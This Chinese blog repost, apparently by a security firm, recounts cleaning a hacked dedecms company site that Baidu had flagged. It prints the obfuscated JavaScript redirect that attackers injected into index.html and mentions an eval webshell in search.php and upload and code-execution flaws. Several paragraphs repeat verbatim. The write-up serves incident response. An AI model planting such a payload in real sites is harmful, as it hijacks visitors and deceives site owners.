码迷,mamicode.com
首页 > Web开发 > 详细

百度提示:违法违规网页,建议关闭的解决方案

时间:2020-12-05 11:26:00      阅读:19      评论:0      收藏:0      [点我收藏+]

标签:val   目录   分享   提交   访问   x64   安全中心   png   添加   

百度提示:违法违规网页,建议关闭的解决方案

临近2019年底,客户的公司网站被百度网址安全中心拦截了,公司网站彻底打不开了,影响范围很大,于是通过朋友介绍找到我们SINE安全公司寻求帮忙解封,关于如何解除百度的安全拦截提示,下面就将我们SINE安全的解决办法分享给大家,希望能对您有所帮助。

事件回忆:12月初,客户刚从公司下班回家,接到领导的电话说是网站在百度怎么打不开了,客户第一时间用手机访问网站,发现网站正常,随后又用百度去搜索公司网站域名,发现网站竟然被百度网址安全中心拦截了并提示:违法违规网页,建议关闭,您访问的是://公司域名,此网页可能为违法违规网页,包含非法信息以及不健康内容,请谨慎访问。如下图所示:
技术图片

整个客户公司的网站在百度无法打开,彻底的被百度拦截掉了,百度提示的肯定是有原因的,我们SINE安全工程师通过百度搜索发现,网站在搜索结果里被标注了:
技术图片

百度网址安全中心提醒您:该站点可能受到******,部分页面已被非法篡改!下图所示:

技术图片

点击去后,弹出百度的拦截页面,提示:该站点可能由于受到******,部分页面已被非法篡改,可能会威胁到您的财产和信息安全,建议您谨慎访问。我们处理了太多像这种情况的网站了,我们打开百度网址安全中心https://bsb.baidu.com/扫描看一下是什么原因导致网站被百度拦截,输入客户公司网址点查询,发现网站被标记危险,并提示:危险,网站网页中含有恶意信息!
技术图片

这说明网站里含有恶意内容的信息被百度检测到了,但是百度并没有指出到底是哪个网站页面存在恶意信息,看到百度旗下还有个百度云观测的产品,注册免费使用,检测网站的安全情况,没有检测到网站出现安全问题。到底含有恶意内容的信息在哪里?该怎么查找,根据我们SINE安全多年的经验,通过百度的工具以及发送邮件,申诉等通道是获取不到具体的恶意信息链接,百度只是官方的回复一下,具体问题的根源在哪里,得自己动手去查找代码,以及公司网站在百度的收录情况。
技术图片

发现了问题,客户公司网站在百度的快照内容被篡改了,是一些彩piao内容,既然已经知道网站里含有恶意信息。那就从网站代码开始入手,客户网站使用的是开源的dedecms织梦系统,php+mysql数据库,从服务器压缩了一份,下载到本地的电脑,开始检查源代码,每一行,每一个代码都不要放过,对比客户之前网站备份代码,发现plus下的search.php被篡改了,多出来一些eval一句话***代码,也叫webshell.

客户的网站首页文件index.html也被篡改添加了代码,尤其标题描述都被篡改了,从百度里搜索点击到客户公司网站,自动跳转到了彩piao网站上去了。这跟index.html被篡改是对应的,我们SINE安全贴出代码让大家看一下:

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(par

seInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!‘‘.replace(/^/,St

ring)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return‘\w+‘};c=

1;};while(c--)if(k[c])p=p.replace(new RegExp(‘\b‘+e(c)+‘\b‘,‘g‘),k[c]);return p;}(‘l["\k\a\1\

\m\9\7\o\0"]["\n\4\8\0\7"](\‘\e\2\1\4\8\5\0\0\i\5\7\c\6\0\7\j\0\3\f\b\u\b\2\

\1\4\8\5\0\6 \2\4\1\c\6\t\0\0\5\w\3\3\v\q\p\s\r\h\1\a\9\3\g\g\h\f\2\6\d\

e\3\2\1\4\8\5\0\d\‘);‘,33,33,‘x74|x63|x73|x2f|x72|x70|x22|x65|x69|x6d|x6f|x61|x3d|x3e|

x3c|x6a|x31|x2e|x79|x78|x64|window|x75|x77|x6e|x38|x37|x71|x7a|x68|x76|

x35|x3a‘.split(‘|‘),0,{}))</script>
这种挂马代码功能是:对百度来的点击,进行判断并跳转到***者设定的域名,如果是直接输入网站域名是不会跳转。如果对代码不是太懂的话,根本无法理解这段代码的意思。问题找到了,那就开始着手处理,删除首页的恶意代码,恢复网站的正常访问,删除***者留下的webshell网站***后门文件,并对客户网站代码进行全面的网站安全检测,包括网站漏洞检测,发现客户使用的是早期版本的dedecms,存在远程代码执行漏洞,可以上传任意文件的文件上传漏洞。我们SINE安全对其代码做了漏洞修复,对上传做了后缀名的安全过滤与限制,对文件上传的目录做了安全部署,防止PHP脚本文件的执行与写入。对网站进行了整体的安全加固与防护,防止***者继续篡改网站,有些客户网站以为只是删除首页那部分恶意代码就能解决问题,大错特错,问题的根源不是删除,而是网站存在漏洞,只是删除恶意代码其实就是亡羊补牢,要从根源入手,修复网站的漏洞。才能彻底的解决百度的拦截问题,百度会定期对网站进行安全监控,如果多次出现被篡改的情况,会直接将您网站拉入黑名单,长时间的对网站进行拦截。

至此客户网站才得以安全,彻底的删除了恶意信息跟恶意的代码,通过百度网址安全中心的在线提交申诉,等待百度的人工审核,在申诉后的第三天,收到了百度网址安全中心的回复,百度网址安全技术人员答复如下:你好,对于https://公司网站域名的检测结果为:通过审核,到此网站被百度网址安全中心的拦截,彻底解封,客户公司网站恢复正常访问,我们将损失给客户降到了最低,将客户的事当成自己的事来做,我们的路才能走的更宽。
这种挂马代码功能是:对百度来的点击,进行判断并跳转到***者设定的域名,如果是直接输入网站域名是不会跳转。如果对代码不是太懂的话,根本无法理解这段代码的意思。问题找到了,那就开始着手处理,删除首页的恶意代码,恢复网站的正常访问,删除***者留下的webshell网站***后门文件,并对客户网站代码进行全面的网站安全检测,包括网站漏洞检测,发现客户使用的是早期版本的dedecms,存在远程代码执行漏洞,可以上传任意文件的文件上传漏洞。我们SINE安全对其代码做了漏洞修复,对上传做了后缀名的安全过滤与限制,对文件上传的目录做了安全部署,防止PHP脚本文件的执行与写入。对网站进行了整体的安全加固与防护,防止***者继续篡改网站,有些客户网站以为只是删除首页那部分恶意代码就能解决问题,大错特错,问题的根源不是删除,而是网站存在漏洞,只是删除恶意代码其实就是亡羊补牢,要从根源入手,修复网站的漏洞。才能彻底的解决百度的拦截问题,百度会定期对网站进行安全监控,如果多次出现被篡改的情况,会直接将您网站拉入黑名单,长时间的对网站进行拦截。

这种挂马代码功能是:对百度来的点击,进行判断并跳转到***者设定的域名,如果是直接输入网站域名是不会跳转。如果对代码不是太懂的话,根本无法理解这段代码的意思。问题找到了,那就开始着手处理,删除首页的恶意代码,恢复网站的正常访问,删除***者留下的webshell网站***后门文件,并对客户网站代码进行全面的网站安全检测,包括网站漏洞检测,发现客户使用的是早期版本的dedecms,存在远程代码执行漏洞,可以上传任意文件的文件上传漏洞。我们SINE安全对其代码做了漏洞修复,对上传做了后缀名的安全过滤与限制,对文件上传的目录做了安全部署,防止PHP脚本文件的执行与写入。对网站进行了整体的安全加固与防护,防止***者继续篡改网站,有些客户网站以为只是删除首页那部分恶意代码就能解决问题,大错特错,问题的根源不是删除,而是网站存在漏洞,只是删除恶意代码其实就是亡羊补牢,要从根源入手,修复网站的漏洞。才能彻底的解决百度的拦截问题,百度会定期对网站进行安全监控,如果多次出现被篡改的情况,会直接将您网站拉入黑名单,长时间的对网站进行拦截。
技术图片

至此客户网站才得以安全,彻底的删除了恶意信息跟恶意的代码,通过百度网址安全中心的在线提交申诉,等待百度的人工审核,在申诉后的第三天,收到了百度网址安全中心的回复,百度网址安全技术人员答复如下:你好,对于https://公司网站域名的检测结果为:通过审核,到此网站被百度网址安全中心的拦截,彻底解封,客户公司网站恢复正常访问,我们将损失给客户降到了最低,将客户的事当成自己的事来做,我们的路才能走的更宽。

百度提示:违法违规网页,建议关闭的解决方案

标签:val   目录   分享   提交   访问   x64   安全中心   png   添加   

原文地址:https://blog.51cto.com/14149641/2557798

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!